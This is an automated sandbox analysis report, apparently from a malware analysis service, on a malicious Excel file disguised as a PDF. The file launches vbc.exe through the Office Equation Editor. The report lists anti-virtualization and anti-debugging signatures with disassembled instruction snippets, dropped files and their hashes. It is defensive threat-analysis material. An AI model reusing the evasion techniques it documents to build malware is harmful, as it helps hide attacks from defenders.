Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Stream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6F9E	6_2_003E6F9E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -60000s >= -30000s			Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]	6_2_003E50CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h]	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h]	6_2_003E71A9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h]	6_2_003E6B93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B mov eax, dword ptr fs:[00000030h]	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h]	6_2_003E7D52

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E2183 cpuid

6_2_003E2183

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	449166
Product:	CloudBasic
Start time:	11:05:26
Start date:	15.07.2021
Sample:	MTIR21487610_0062180102_20210714081247.PDF.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	168c2cabea51b16aa19a152a652254f5
SHA1:	477715c6a9d3219ea85a60eac9c80af83a102357
SHA256:	9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	FCFB0EC70F1419EDE8A534CC95CB61E9	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2651CA.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	DDF289FE9FBEE88B186842F4CA188ABC	D15B3CE044EA211660351020692DA491E83C1480	96A9A2298922548EA172E06B5945D134D0937502B85C2461A1F4DD211FB815D7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E1DDD1.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	55187CB63A1502A53DFF777D0ED28018	9C1CD11BEC1ACADE219D95701D4906DF54719DEC	533B9EF863D579278C5903883DD56C133585D35D011492158E9CC474165B984B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B42899E.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\750B075C.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95A3F107.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A242A343.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7A07AD.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FCFB0EC70F1419EDE8A534CC95CB61E9	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A

Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs